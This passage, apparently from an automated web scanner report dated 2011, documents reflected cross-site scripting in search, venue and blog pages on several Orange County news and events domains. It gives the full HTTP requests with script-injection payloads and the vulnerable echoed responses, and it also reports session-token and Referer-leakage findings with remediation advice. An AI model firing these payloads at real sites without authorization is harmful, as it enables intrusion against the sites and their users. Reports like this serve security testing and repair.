GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:10:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 102
ETag: "4cd0d17676110543bb27db6048bc57cc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNmU3NTM0ZjgxZTI4MmI2MjMzY2I0YjgxYTFhZTU0YTAiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--a49d664e70e77f5c44832f46c21f504a901eeece; path=/; expires=Tue, 03-May-2011 19:10:05 GMT; HttpOnly
Content-Length: 33453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="svt" value="text66943"><script>alert(1)</script>2a358999d52" />
...[SNIP]...

1.10. http://events.ocregister.com/search [swhat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 319
ETag: "904a9aaeecaa3760ec4ae913352ea43f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlZDAyNjcyNTliZDUyMTA5NTQ0YTQ3MmQxZWQzOTUyOWYiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCImc3VwZXJib3dsMTEzNjQ2OTxhIGI9Yz4yNzE5Y2JiNmFiIg5sYXN0X3doZW4iACILYnVja2V0RiINbGFzdF9yc3MiACINbG9jYXRpb257ECIJY2l0eSILSXJ2aW5lIgtyYWRpdXNpIyINbGF0aXR1ZGVmGjMzLjY3MTM5OTk5OTk5OTk5OABEZyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0lydmluZSwgQ0EiDXRpbWV6b25lIhhBbWVyaWNhL0xvc19BbmdlbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmEC0xMTcuNzkxAMi0IhF3aGVyZV9zdHJpbmciDklydmluZSxDQSIKc3RhdGUiB0NB--49479bafbda8b6a30f182d75b202be3c0913946a; path=/; expires=Tue, 03-May-2011 19:06:32 GMT; HttpOnly
Content-Length: 18888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
&amp;new=n&amp;search=true&amp;srad=30&amp;srss=&amp;st=any&amp;st_select=event&amp;svt=text&amp;swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&amp;swhen=&amp;swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a>
...[SNIP]...

1.11. http://events.ocregister.com/search [swhat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 365
ETag: "242db8931148a3dfc98ba516700c83a1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlZTc5OWMxOTJhNDhjYzU5ZjM4MDNkM2M5NTM4Y2JlNTEiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIwc3VwZXJib3dsMTFiZDUxMDwvc2NyaXB0PjxhIGI9Yz41MzVhNmVkNmYzOCIObGFzdF93aGVuIgAiC2J1Y2tldEYiDWxhc3RfcnNzIgAiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nIg5JcnZpbmUsQ0EiCnN0YXRlIgdDQQ%3D%3D--7e15617fc40bd48892f472ccad6abcf17f0e2f0e; path=/; expires=Tue, 03-May-2011 19:05:56 GMT; HttpOnly
Content-Length: 19242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
;
google_ad_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11bd510</script><a b=c>535a6ed6f38 Irvine,CA events";

//-->
...[SNIP]...

1.12. http://events.ocregister.com/search [swhen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "9d9076ac94b1cfc6678e7c3e3c15d6e9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYmMyYWFhZWFhMzMxYWEzMmY0Mzc5ZTZjZTliNzcwMWIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIuODVkZjA8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BNDA0YTE5OTc1NzIiC2J1Y2tldEYiDWxhc3RfcnNzIgAiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nIg5JcnZpbmUsQ0EiCnN0YXRlIgdDQQ%3D%3D--2523d0baef5e6ef9f9771c16975a4313e2909934; path=/; expires=Tue, 03-May-2011 19:07:23 GMT; HttpOnly
Content-Length: 19667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

1.13. http://events.ocregister.com/search [swhere parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:07:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 1138
ETag: "468d769b70f16b15874182577d12a1ab"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNWQzNTk1YjIwZGEzOGQxYjAxZWY4MDYzOTdlZjU3NzUiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIqSXJ2aW5lLENBYTIxOGMiO2FsZXJ0KDEpLy8yNWZlYmU3ODQ1YSIKc3RhdGUiB0NB--42c543cfa16a16509c98ac9cf99589674206e7ce; path=/; expires=Tue, 03-May-2011 19:07:50 GMT; HttpOnly
Content-Length: 19341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
d_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CAa218c";alert(1)//25febe7845a events";

//-->
...[SNIP]...

1.14. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "461e66ba3abcf21317119f039b7ecc26"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNmQ4NmVkZjY4NmUzMjkwODEyN2E4MmI3ZDlkNDBlYWQiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--30890568bf662ec39e975be34aca81d31951bc89; path=/; expires=Tue, 03-May-2011 19:05:12 GMT; HttpOnly
Content-Length: 41476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" />
...[SNIP]...

1.15. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.orangecounty.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "8b8ae40e2ec1f011dfdb66c80bbcae14"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: zvents_tracker_sid=s45K_iUEvTZyVKcV6ZgkGw.100548895; path=/; expires=Fri, 03-Feb-2012 19:05:13 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMjUzNDE5NGU4ZmI2MDZlOWZlZGZjYzBlYzkzOGVhMjUiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaTciDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0234d99676f0e755442d2bdfa35eb38ed6b7ff6f; path=/; expires=Tue, 03-May-2011 19:05:13 GMT; HttpOnly
Content-Length: 74110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?fcc4c"><script>alert(1)</script>b1440f97378=1" />
...[SNIP]...

1.16. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" />
...[SNIP]...

1.17. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78253


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" />
...[SNIP]...

2. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:53 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 277
ETag: "fd6b16c95b7fc34df9e8c1762074f05b"
Cache-Control: must-revalidate, private, max-age=0
